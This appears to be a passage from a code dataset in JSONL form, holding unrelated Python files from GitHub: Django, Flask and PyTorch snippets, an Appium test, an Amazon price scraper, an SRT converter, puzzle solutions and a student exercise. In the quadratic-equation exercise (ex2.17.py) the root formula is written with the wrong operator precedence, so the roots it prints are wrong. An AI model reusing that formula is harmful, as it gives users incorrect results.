card_dict.get('card_faces')[0].get(\n 'image_uris')\n if images:\n small_url = images.get(\"small\")\n normal_url = images.get(\"normal\")\n art_crop_url = images.get(\"art_crop\")\n alt_images = card_dict.get('card_faces')[1].get(\n 'image_uris')\n if alt_images:\n alt_small_url = alt_images.get(\"small\")\n alt_normal_url = alt_images.get(\"normal\")\n alt_art_crop_url = alt_images.get(\"art_crop\")\n print(card_dict[\"set\"], card_dict['collector_number'])\n Card.objects.create(\n name=card_dict.get(\"name\"),\n mana_cost=card_dict.get(\"mana_cost\"),\n type_line=card_dict.get(\"type_line\"),\n layout=card_dict.get('layout'),\n set=card_dict.get(\"set\"),\n collector_number=card_dict.get('collector_number'),\n set_name=card_dict.get(\"set_name\"),\n oracle_id=card_dict.get(\"oracle_id\"),\n arena_id=card_dict.get(\"arena_id\"),\n oracle_text=card_dict.get(\"oracle_text\"),\n image_url_small=small_url,\n image_url_normal=normal_url,\n image_url_art_crop=art_crop_url,\n alt_image_url_small=alt_small_url,\n alt_image_url_normal=alt_normal_url,\n alt_image_url_art_crop=alt_art_crop_url,\n legalities=card_dict.get('legalities')\n )\n","repo_name":"marcuschiriboga/magicsite","sub_path":"cardhandler/management/commands/bootstrap_data.py","file_name":"bootstrap_data.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40466601016","text":"import time\n\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\n\ndes = {\n 'platformName': 'Android',\n 'platformVersion': '7.0.1', #填写android虚拟机的系统版本\n 'deviceName': 'Samsung Galaxy S9', #填写安卓虚拟机的设备名称\n 'appPackage': 'com.android.calculator2', #填写被测试包名\n 'appActivity': 'com.android.calculator2.Calculator', #填写被测试app入口\n 'udid': '192.168.56.102:5555', # 填写通过命令行 adb devices 查看到的 uuid(指定已连接在MAC上的虚拟机)\n 'noReset': True,\n 'unicodeKeyboard': True,\n 'resetKeyboard': True,\n}\n\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', des)\n#xpath属性定位\ntime.sleep(3)\ndriver.find_element_by_xpath(\"//android.widget.Button[@resource-id='com.android.calculator2:id/digit_8']\").click()\ntime.sleep(2)\ndriver.find_element_by_xpath(\"//android.widget.Button[@text='x']\").click()\ntime.sleep(2)\ndriver.find_element_by_xpath(\"//android.widget.Button[@text='2']\").click()\ntime.sleep(3)\ndriver.find_element_by_xpath(\"//android.widget.Button[@content-desc='delete' and @resource-id='com.android.calculator2:id/del']\").click()\n","repo_name":"sunny-lhy-zqw/niucoo","sub_path":"xpath_test.py","file_name":"xpath_test.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23655381451","text":"def count(str):\n## lady = [] # stores the different color variables\n## counter = [] # stores the occurances of each color variable in the order of the lady bucket\n d = {}\n for i in str: # runs through each item in the parameter string\n if i != \"_\": # as long as i is not underscore\n if i not in d: # if the i is not in the lady bucket\n## lady.append(i) # add i to the lady bucket\n## counter.append(1) # add 1 t the counter bucket to begin the count and create the range\n d[i] = 1\n else: #otherwise\n d[i] += 1 #adds 1 to each occurance of i at the index of i\n return d\n\ndef happy(n,str):\n if n < 3: #if the length is less than 3 (if length is 2,1,0)\n if n == 0: #the string can't have nothing in it\n return False\n elif n == 1 and str[0] == \"_\": #if only an empty cell\n return True\n elif n ==2 and str[0] == str[1]: #if the first is the same as the second\n return True\n else:\n return False\n else: # if length is greater than 3 and \"_\" in b\n first = str[0]\n d = dict(count(str)).values()\n counter = 0\n if min(d) >= 2 and \"_\" not in str:\n for i in range(1,n):\n if first==str[i]:\n continue\n else:\n first = str[i]\n counter = counter + 1\n if counter >= len(d):\n return False\n else:\n return True\n if min(d) < 2:\n return False\n return True\n\ndef happyLadybug(n,b):\n if happy(n,b) == True: #if happy/True\n return \"YES\"\n else:\n return \"NO\"\n \ndef test(n,b):\n return happyLadybug(n,b)\n\nprint(\"-----------YES-----------\")\nprint(1, test(7,\"RBY_YBR\"), \"YES\")\nprint(2, test(6,\"B_RRBR\"), \"YES\")\nprint(3, test(7,\"AABBC_C\"), \"YES\")\nprint(4, test(4,\"AABB_\"), \"YES\")\nprint(5, test(1,\"_\"), \"YES\")\nprint(6, test(2,\"__\"), \"YES\")\nprint(7, test(10,\"DD__FQ_QQF\"), \"YES\")\nprint(8, test(3,\"DD_\"), \"YES\")\nprint(9, test(2,\"DD\"), \"YES\")\nprint(10, test(9,\"QQAABBCCC\"), \"YES\")\nprint(11, test(9,\"QAQABB_CC\"), \"YES\")\nprint(\"-----------NO------------\")\nprint(1, test(6,\"X_Y__X\"), \"NO\")\nprint(2, test(5,\"AABBC\"), \"NO\")\nprint(3, test(2,\"RX\"), \"NO\")\nprint(4, test(0,\"\"), \"NO\")\nprint(5, test(4,\"QAQA\"), \"NO\")\nprint(6, test(4,\"BAAB\"), \"NO\")\nprint(6, test(5,\"AABAA\"), \"NO\")\n","repo_name":"ef1301/csci127-assignments","sub_path":"lab_04/lady.py","file_name":"lady.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15528216432","text":"from django import forms\n\nfrom .models import Region, Subregion\n\nPAYMENT_OPTIONS = (\n (\"C\", \"Cash\"),\n (\"P\", \"PayPal\"),\n)\n\n\nclass CheckoutForm(forms.Form):\n address = forms.CharField(\n max_length=200,\n required=True,\n label=\"Address\",\n widget=forms.TextInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"123, Quang Trung St, Ward 10\",\n }\n ),\n )\n address2 = forms.CharField(\n max_length=200,\n required=False,\n label=\"Address 2 (Optional)\",\n widget=forms.TextInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"Apartment, block, suite, etc.\",\n }\n ),\n )\n region = forms.ModelChoiceField(\n queryset=Region.objects.all(),\n label=\"Province/City\",\n empty_label=\"Select\",\n widget=forms.Select({\"class\": \"form-control\"}),\n )\n subregion = forms.ModelChoiceField(\n queryset=Subregion.objects.none(),\n label=\"District/City\",\n empty_label=\"Select\",\n widget=forms.Select({\"class\": \"form-control\"}),\n )\n # same_shipping_address = forms.BooleanField(required=False)\n # save_info = forms.BooleanField(required=False)\n # payment_option = forms.ChoiceField(choices=PAYMENT_OPTIONS)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if \"region\" in self.data: # Check if region data is submitted\n try:\n region_id = int(self.data.get(\"region\"))\n self.fields[\"subregion\"].queryset = Subregion.objects.filter(\n region_id=region_id\n )\n except (ValueError, TypeError):\n pass\n","repo_name":"D2VD/testweb2","sub_path":"market/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15943581924","text":"\"\"\"\nReverse a String – Enter a string and the program will reverse it and\nprint it out.\n \"\"\"\nimport sys\n\ndef reverse_string (text):\n chars = list(text)\n chars.reverse()\n return ''.join(chars)\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n text = reverse_string(sys.argv[1])\n else:\n text = 'Error: No string!'\n print(text)\n","repo_name":"Mirsait/mega_projects","sub_path":"Text/reverse_a_string/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40588283164","text":"#!/usr/bin/env python3\n\n\nimport argparse\n\nclass Formatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter):\n pass\n\nparser = argparse.ArgumentParser(\n description='''Convert 24fps SRT files to 23.976 fps.\nDavinci Resolve project exports in 24fps even when the project is in 23.976, so this conversion is needed to prevent the SRT files from drifting.\n\nAuthor: Kiyoon Kim (yoonkr33@gmail.com)''',\n formatter_class=Formatter)\nparser.add_argument('input_files', type=str, nargs='+',\n help='files you want to change names into dates')\n\nargs = parser.parse_args()\n\nimport coloredlogs, logging, verboselogs\n\nimport os, sys\nimport glob\nimport srt\nimport datetime\n\nimport srt_utils\n\n\nif __name__ == \"__main__\":\n logger = verboselogs.VerboseLogger(__name__)\n coloredlogs.install(fmt='%(asctime)s - %(levelname)s - %(message)s', level='INFO', logger=logger)\n\n nb_error = 0\n nb_warning = 0\n\n num_input_files = 0\n for origpath in args.input_files:\n for path in glob.glob(origpath): # glob: Windows wildcard support\n num_input_files += 1\n\n logger.info(\"%d files to convert\", num_input_files)\n\n for origpath in args.input_files:\n for source_file in glob.glob(origpath): # glob: Windows wildcard support\n root, fname_ext = os.path.split(source_file)\n fname, fext = os.path.splitext(fname_ext)\n\n dest_file = source_file\n\n logger.info(\"Converting SRT to %s\", dest_file)\n\n with open(source_file, 'r', encoding=\"utf8\") as f:\n srt_lines = list(srt.parse(f))\n\n srt_utils.srt_drift_fix_NTSC(srt_lines)\n\n with open(dest_file, 'w', encoding=\"utf8\") as f:\n f.write(srt.compose(srt_lines))\n\n if nb_warning > 0:\n logger.warning(\"%d warning(s) found.\", nb_warning)\n\n if nb_error > 0:\n logger.error(\"%d error(s) found.\", nb_error)\n else:\n logger.success(\"Conversion successful!\")\n","repo_name":"kiyoon/camera-tools","sub_path":"srt_framerate_convert.py","file_name":"srt_framerate_convert.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18233175519","text":"import csv\nimport os\nimport shutil\nimport sys\nimport numpy as np\nfrom PyQt5 import QtWidgets, QtCore, QtGui, sip\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom xlsxwriter.workbook import Workbook\nimport SimpleITK as sitk \nfrom time import sleep\nimport qtawesome\nimport cv2\nimport shutil\nfrom copy import deepcopy\nimport subprocess\nimport xlwt\nimport logging\nfrom PIL import Image, ImageQt\nimport torch \nimport torch.nn as nn\nfrom torchvision.models import resnet18\n\nlabel_to_id = {\n 'BACKGROUND': 0,\n 'MPSI': 1,\n 'MPSO': 2,\n 'MVEN': 3,\n 'SAT': 4,\n 'VAT': 5,\n}\n\ncmap = np.array(\n [\n (0, 0, 0),\n (255, 255, 0),\n (0, 205, 0),\n (72, 118, 255),\n (0, 0, 139),\n (255, 0, 0),\n ],\n dtype=np.uint8,\n)\n\ndef read_dcm(dcm_dir):\n reader = sitk.ImageSeriesReader()\n img_name = reader.GetGDCMSeriesFileNames(dcm_dir)\n reader.SetFileNames(img_name)\n image = reader.Execute()\n return image\n\nclass MyThread(QThread):\n signalForText = pyqtSignal(str)\n\n def __init__(self, data=None, parent=None):\n super(MyThread, self).__init__(parent)\n self.data = data\n\n def write(self, text):\n self.signalForText.emit(str(text)) # 发射信号\n\n def run(self):\n log = os.popen(self.data)\n print(log.read())\n\ndef build_logging(filename):\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename=filename,\n filemode='w')\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n return logging\n\nclass L3LocModel(nn.Module):\n def __init__(self, N_neighbor=2, d_model=512):\n super().__init__()\n \n backbone = resnet18(pretrained=False)\n backbone.conv1 = nn.Conv2d(1, backbone.conv1.out_channels,\n kernel_size=backbone.conv1.kernel_size,\n stride=backbone.conv1.stride,\n bias=backbone.conv1.bias)\n self.pool = None\n self.cnn = nn.Sequential(*list(backbone.children())[:-1])\n self.classifier = nn.Sequential(\n nn.Dropout(p=0.0),\n nn.Linear(d_model*(1+2*N_neighbor), d_model),\n nn.Linear(d_model, 1)\n )\n self.N_neighbor = N_neighbor\n\n def forward(self, x, N_lst=None):\n # x: (B, N, 3, 96, 96)\n B, N, C, H, W = x.shape\n x = x.view(B*N, C, H, W)\n cnn_feat = self.cnn(x)\n if self.pool:\n cnn_feat = self.pool(cnn_feat)\n cnn_feat = cnn_feat.view(B, N, 1, -1) # (B, N, 1, 512)\n \n feat = []\n for n in range(-self.N_neighbor, self.N_neighbor+1): # (-2, -1, 0, 1, 2)\n if n <= 0: \n tmp = cnn_feat[:, abs(n):, ...]\n tmp = torch.cat([tmp, torch.zeros(B, abs(n), *cnn_feat.shape[-2:]).float().to(cnn_feat.device)], dim=1)\n else: \n tmp = cnn_feat[:, :-n, ...]\n tmp = torch.cat([torch.zeros(B, n, *cnn_feat.shape[-2:]).float().to(cnn_feat.device), tmp], dim=1)\n feat.append(tmp)\n feat = torch.cat(feat, dim=2) # (B, N, 1+2*N_neighbor, 512)\n feat = feat.view(B, N, -1)\n pred = self.classifier(feat).squeeze(dim=2)\n return pred","repo_name":"czifan/TSPC.PyQt5","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"5239504342","text":"import os\nfrom app import app, models, sr_net\nfrom werkzeug.utils import secure_filename\nfrom flask import Flask, request, redirect, url_for, render_template, send_from_directory\n\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n mode = request.form['mode']\n print(request.form)\n file = request.files['file']\n \n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join('app', app.config['UPLOAD_FOLDER'], filename))\n\n \n return redirect(url_for('result',\n filename=filename, mode=mode))\n \n return render_template('index.html')\n\n@app.route('/result/')\ndef result(filename, mode=None):\n mode = request.args.get('mode')\n print(mode)\n if mode == \"bench\":\n print('bench')\n result_path = sr_net.get_bench_image('./app/upload/', filename, 4)\n if result_path[-1] == 'fail':\n result_path = sr_net.get_bench_image('./app/upload/','fail.png',4)\n elif mode == '4':\n print(4)\n result_path = sr_net.get_sr_image('./app/upload/', filename, 4)\n if result_path[-1] == 'fail':\n result_path = sr_net.get_sr_image('./app/upload/','fail.png',4)\n elif mode == '2j':\n print(4)\n result_path = sr_net.get_sr_image_jpeg('./app/upload/', filename, 4)\n if result_path[-1] == 'fail':\n result_path = sr_net.get_sr_image_jpeg('./app/upload/','fail.png',4)\n elif mode == '2':\n print(2)\n result_path = sr_net.get_sr_image('./app/upload/', filename, 2)\n if result_path[-1] == 'fail':\n result_path = sr_net.get_sr_image('./app/upload/','fail.png',2)\n else :\n result_path = ['lr_4x_'+filename, 'bicubic_4x_'+filename, 'sr_4x_'+filename]\n return render_template('result.html',filename = [filename] + result_path)\n\n@app.route('/upload/')\ndef upload(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\n\n@app.errorhandler(413)\ndef error413(e):\n return \"File is too big\", 413","repo_name":"nonbanana/super_resolution_demo","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12844285073","text":"from django.shortcuts import render\nfrom django.views import generic\nfrom projects.models import Project\n\n\nclass ProjectList(generic.ListView):\n model = Project\n template_name = 'view_projects.html'\n context_object_name = \"projects\"\n\n def get_context_data(self, **kwargs):\n context = super(ProjectList, self).get_context_data(**kwargs)\n\n context['myVariableOfContext'] = 0\n\n return context\n","repo_name":"fxleblanc/SiteCedille2.0","sub_path":"django/cedille/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24001541410","text":"import requests\nfrom bs4 import BeautifulSoup\n# import lxml\nimport re\n# import os\n# import smtplib\nimport datetime\nimport json\n\nJSON_FILE = \"amazon_google_pixel_5g.json\"\nAMAZON_URL = \"https://www.amazon.com/Google-Pixel-5G-Factory-Unlocked/dp/B09DV93S9K/ref=sr_1_4?\" \\\n \"keywords=google+pixel&qid=1645364495&s=electronics&sprefix=goo%2Celectronics-intl-ship%2C188&sr=1-4\"\nmy_headers = {\n \"Accept-Language\": \"sk,cs;q=0.8,en;q=0.6,en-US;q=0.4,pl;q=0.2\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/98.0.4758.102 Safari/537.36\",\n # \"cookie\": \"i18n-prefs=EUR\",\n}\nmy_cookies = {\n \"i18n-prefs\": \"EUR\",\n \"sp-cdn\": \"L5Z9:SK\",\n}\n\nresponse = requests.get(url=AMAZON_URL, headers=my_headers, cookies=my_cookies)\nresponse.raise_for_status()\namazon_page = response.text\nsoup = BeautifulSoup(amazon_page, \"html.parser\")\n\n# print(soup.prettify())\nAMAZON_PRICE_LIMIT = 55 # real price 53 - 54 USD\namazon_product_name = soup.select_one(\"span#productTitle\").getText().strip()\nprint(amazon_product_name)\namazon_product_price = soup.select_one(\n \"div#corePrice_desktop span.apexPriceToPay span.a-offscreen\"\n).getText()\nprint(type(amazon_product_price), \" / \", amazon_product_price)\namazon_prod_pr_str = re.sub(r\"[^\\d,.]\", '', amazon_product_price)\nprint(amazon_prod_pr_str)\namazon_product_price_float = float(amazon_prod_pr_str.replace(\",\", \".\"))\nprint(amazon_product_price_float)\nprint(\"...\")\n\nrecord_datetime = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\ndata_dict = {\n \"product_name\": amazon_product_name,\n \"product_link\": AMAZON_URL,\n \"min_price\": \"\",\n \"price_history\": [(str(record_datetime), amazon_product_price_float)],\n}\n\ntry:\n with open(JSON_FILE, mode=\"r\") as file:\n # Reading all old data from json file, if exists\n data = json.load(file)\n if amazon_product_price_float < data['min_price']:\n data['min_price'] = amazon_product_price_float\n data['price_history'].append(data_dict['price_history'][0])\n # print(\"data: \", data)\nexcept FileNotFoundError:\n # print(\"File not found.\")\n with open(JSON_FILE, mode=\"w\") as file:\n data_dict['min_price'] = amazon_product_price_float\n json.dump(data_dict, file, indent=4)\nelse:\n with open(JSON_FILE, mode=\"w\") as file:\n json.dump(data, file, indent=4)\n","repo_name":"zwieratko/python-quick-notes","sub_path":"bs4_with_headers_cookies.py","file_name":"bs4_with_headers_cookies.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12314537824","text":"import sys\n\nimport numpy as np\nfrom keras.models import load_model\nimport keras\n\n\nclass PedestrianCounter:\n def __init__(self):\n self.model = load_model('model.h5', custom_objects={'keras': keras})\n self.buffer = np.zeros((1, 100, 24, 32, 1))\n self.count = 0.0\n self.i = 0\n\n def update(self, frame):\n expanded = np.expand_dims(frame, axis=2)\n self.buffer[0, 1:] = self.buffer[0, :-1]\n self.buffer[0, 1] = expanded\n\n self.process(self.buffer)\n\n self.i += 1\n\n def process(self, buffer):\n out = np.argmax(self.model.predict(buffer)[0])\n self.count += out / 100.0\n print(self.count, out)\n","repo_name":"franz-bender-spreewunder/Quirinius","sub_path":"Quirinius/PedestrianCounter.py","file_name":"PedestrianCounter.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11934669544","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nFaça um programa que calcule as raízes de uma equação do segundo grau, na\nforma ax2 + bx + c. O programa deverá pedir os valores de a, b e c e fazer as\nconsistências, informando ao usuário nas seguintes situações:\na. Se o usuário informar o valor de A igual a zero, a equação não é\ndo segundo grau e o programa não deve pedir os demais valores,\nsendo encerrado;\nb. Se o delta calculado for negativo, a equação não possui raizes\nreais. Informe ao usuário e encerre o programa;\nc. Se o delta calculado for igual a zero a equação possui apenas uma\nraiz real; informe-a ao usuário;\nd. Se o delta for positivo, a equação possui duas raizes reais;\ninforme-as ao usuário;\n\"\"\"\n\nprint(\"=====================================================\")\n\nimport math\n\na = int(input(\"Digite o primeiro numero: \"))\nif a == 0:\n\tprint(\"A equação nao e do segundo grau.\")\nelse:\n\tb = int(input(\"Digite o segundo numero: \"))\n\tc = int(input(\"Digite o terceiro numero: \"))\n\tdelta = (math.pow(b,2) - (4*a*c))\n\tif delta < 0:\n\t\tprint(\"A equacao nao possui raizes reais.\")\n\tif delta == 0:\n\t\traiz = ((-1) * b + math.sqrt(delta) / (2 * a))\n\t\tprint(\"A equacao possui apenas uma raiz real. %.2f\" % raiz)\n\tif delta > 0:\n\t\traiz1 = ((-1) * b + math.sqrt(delta) / (2 * a))\n\t\traiz2 = ((-1) * b - math.sqrt(delta) / (2 * a))\n\t\tprint(\"A equacao possui duas raizes reais.\")\n\t\tprint(\"Raiz 1: %.2f\" % raiz1)\n\t\tprint(\"Raiz 2: %.2f\" % raiz2)\n\nprint(\"=====================================================\")\n","repo_name":"WalterBrito/Python","sub_path":"EstruturaDecisao/ex2.17.py","file_name":"ex2.17.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19995940419","text":"#!/usr/bin/env python3\nimport datetime\nimport logging\nimport os\nimport sys\n \nimport ncscli.batchRunner as batchRunner\n \nclass pythonFrameProcessor(batchRunner.frameProcessor):\n '''defines details for using python in a simple batch job'''\n workerScriptPath = 'helloLocation.py'\n \n def frameOutFileName( self, frameNum ):\n return 'frame_%d.out' % (frameNum)\n \n def frameCmd( self, frameNum ):\n pythonFileName = os.path.basename( self.workerScriptPath )\n cmd = 'python3 %s %d | tee %s' % \\\n (pythonFileName, frameNum, self.frameOutFileName(frameNum) )\n return cmd\n \nif __name__ == \"__main__\":\n # configure logger\n logging.basicConfig()\n dateTimeTag = datetime.datetime.now().strftime( '%Y-%m-%d_%H%M%S' )\n outDataDirPath = 'data/location_' + dateTimeTag\n \n rc = batchRunner.runBatch(\n frameProcessor = pythonFrameProcessor(),\n pushDeviceLocs=True,\n commonInFilePath = pythonFrameProcessor.workerScriptPath,\n authToken = os.getenv( 'NCS_AUTH_TOKEN' ) or 'YourAuthTokenHere',\n timeLimit = 1200,\n instTimeLimit = 300,\n frameTimeLimit = 30,\n filter = '{\"dpr\": \">=24\"}',\n outDataDir = outDataDirPath,\n encryptFiles = False,\n startFrame = 1,\n endFrame = 10\n )\n sys.exit( rc )\n","repo_name":"neocortix/ncscli","sub_path":"examples/batchMode/runBatchLocation.py","file_name":"runBatchLocation.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"21975686346","text":"#!/usr/bin/env python\nimport shlex\n\nfrom snixCore import execute, execute_in_dir_and_revert, abort\nimport snixLogger\n\nlogger = snixLogger.SnixLogger.logger()\n\n\nclass Repo:\n \"\"\"Represents a repository.\"\"\"\n\n def __init__(self, context):\n if not type(context) is dict:\n abort('Cannot clone a repo without the configuration.')\n self._context = context\n\n def clone(self):\n with execute_in_dir_and_revert(self._context['snix_root']):\n msg = \"Cloning {0}...\".format(self._context['repo_location'])\n cmd, use_shell = self._build_cmd()\n logger.info(msg + cmd)\n ret = execute(shlex.split(cmd), use_shell)\n logger.info(msg + 'StatusCode:' + str(ret))\n logger.info(msg + 'Done!')\n\n def _build_cmd(self):\n return \"git clone --progress \" + self._context['repo_location'], False\n","repo_name":"nishantkakar/snix","sub_path":"repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"792684092","text":"# import csv\nimport os\nimport CSV1\nimport pytest\n\n\ndef test_if_input_for_list_is_None():\n empty_list = None\n with pytest.raises(ValueError):\n assert CSV1.CSV_list(empty_list, \"FC-List\")\n\n\ndef test_exception_if_list_is_empty():\n empty_list = []\n with pytest.raises(ValueError):\n assert CSV1.CSV_list(empty_list, \"FC-List\")\n\n\ndef test_exception_when_Filename_is_above_80_characters():\n Filename = \"This Filename is way to long so it hopefully spits out an error eventually, hopefully, if at all or maybe not.\"\n with pytest.raises(ValueError):\n assert CSV1.CSV_list([\"Dr Suna\", \"Freya Luna\"], Filename)\n\n\ndef test_that_list_is_written_to_a_file():\n Filename = CSV1.CSV_list([\"Dr Suna\", \"Ichiro\", \"Freya Luna\"], \"FC-List\")\n File = open(Filename, \"r\")\n Result = File.read()\n File.close()\n os.remove(str(Filename))\n assert Result == \"Dr Suna, Ichiro, Freya Luna\"\n","repo_name":"Zoracs/Phase-1","sub_path":"CSV_test.py","file_name":"CSV_test.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3844249762","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.special import factorial\n\n# Hypothesis space\nx = np.arange(0, 30)\n\n# Three poisson distributions\np1 = 3.0**x * np.exp(-3.0) / factorial(x)\n#p1 = p1/p1.sum()\n\np2 = 6.0**x * np.exp(-6.0) / factorial(x)\n#p2 = p2/p2.sum()\n\np3 = 15.0**x * np.exp(-15.0) / factorial(x)\n#p3 = p3/p3.sum()\n\n\n# Set fonts\nplt.rc(\"font\", size=16, family=\"Serif\", serif=\"Computer Sans\")\nplt.rc(\"text\", usetex=True)\n\n# Make the plot\nplt.bar(x, p1, alpha=0.4, label=r\"$\\lambda = 3$\")\nplt.bar(x, p2, alpha=0.4, label=r\"$\\lambda = 6$\")\nplt.bar(x, p3, alpha=0.4, label=r\"$\\lambda = 15$\")\nplt.xlabel(r\"$x$\")\nplt.ylabel(\"Probability\")\nplt.legend(loc=\"upper right\")\nplt.savefig(\"poisson.pdf\")\n\n","repo_name":"eggplantbren/Madrid","sub_path":"slides/poisson.py","file_name":"poisson.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12735958771","text":"import cProfile\nimport os\nimport pstats\nimport re\nimport sys\nimport threading\nfrom typing import List, NamedTuple\n\n\nclass FunctionStatistics(NamedTuple):\n name: str\n num_calls: int\n total: int\n cumulative: int\n\n def __repr__(self) -> str:\n return f'{self.name} ({self.num_calls} calls): {self.total} ns / {self.cumulative} ns'\n\n\nclass StdoutCapturer:\n def __init__(self):\n self.captured_stdout = ''\n\n def __enter__(self):\n self.stdout_fileno = sys.stdout.fileno()\n self.original_stdout = os.dup(self.stdout_fileno)\n\n # Create a new pipe\n self.stdout_pipe = os.pipe()\n\n # Replace stdout with the pipe's input\n os.dup2(self.stdout_pipe[1], self.stdout_fileno)\n os.close(self.stdout_pipe[1])\n\n def drain_pipe():\n while True:\n data = os.read(self.stdout_pipe[0], 1024)\n if not data:\n break\n self.captured_stdout += data.decode()\n\n self.pipe_reader = threading.Thread(target=drain_pipe)\n self.pipe_reader.start()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # Close the input of the pipe to make the reader thread exit\n os.close(self.stdout_fileno)\n self.pipe_reader.join()\n\n # Clean up the pipe and restore the original stdout\n os.close(self.stdout_pipe[0])\n os.dup2(self.original_stdout, self.stdout_fileno)\n os.close(self.original_stdout)\n\n\ndef capture_stats_output(profile: cProfile.Profile) -> str:\n \"Captures the cProfile statistics output to a string.\"\n\n stats = pstats.Stats(profile)\n stats.sort_stats(pstats.SortKey.STDNAME)\n\n capture = StdoutCapturer()\n with capture:\n stats.print_stats()\n\n return capture.captured_stdout\n\n\ndef parse(output: str) -> List[FunctionStatistics]:\n \"Parses the cProfile output.\"\n\n lines = output.splitlines()\n stripped = [l.strip() for l in lines]\n non_empty = [l for l in stripped if len(l) != 0]\n\n assert 'Ordered by: standard name' == non_empty[1]\n\n # Check that the column names match our expected format\n header = non_empty[2]\n check_header(header)\n\n special_method_name_pattern = re.compile(r'\\{(.+)\\}')\n fn_name_pattern = re.compile(r'(\\(.+\\))')\n\n stats = []\n\n for line in non_empty[3:]:\n elems = line.split()\n\n if '/' in elems[0]:\n num_calls = int(elems[0].split('/')[1])\n else:\n num_calls = int(elems[0])\n total_time = float(elems[1])\n total_time_per_call = float(elems[2])\n cumulative_time = float(elems[3])\n cumulative_time_per_call = float(elems[4])\n\n fn_name = None\n matches = special_method_name_pattern.search(line)\n if matches:\n fn_name = matches.group(0)\n else:\n matches = fn_name_pattern.search(elems[-1])\n if matches:\n fn_name = matches.group(0)\n else:\n raise Exception(\n 'Could not parse function name from cProfile output')\n\n # Remove the parantheses/brackets from the function/method name\n fn_name = fn_name[1:-1]\n\n total_time_ns = int(total_time * 1_000_000_000)\n cumulative_time_ns = int(cumulative_time * 1_000_000_000)\n\n stats.append(FunctionStatistics(\n fn_name, num_calls, total_time_ns, cumulative_time_ns))\n\n return stats\n\n\ndef check_header(header: str):\n \"Checks the give stats header to match the supported format.\"\n columns = header.split()\n\n assert 'ncalls' == columns[0]\n assert 'tottime' == columns[1]\n assert 'cumtime' == columns[3]\n","repo_name":"GabrielMajeri/adaptive-profiler","sub_path":"util/cprofile.py","file_name":"cprofile.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24156972302","text":"from aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import CallbackQuery\nfrom apscheduler_di import ContextSchedulerDecorator\n\nfrom tgbot.db import update_notifications_in_db\nfrom 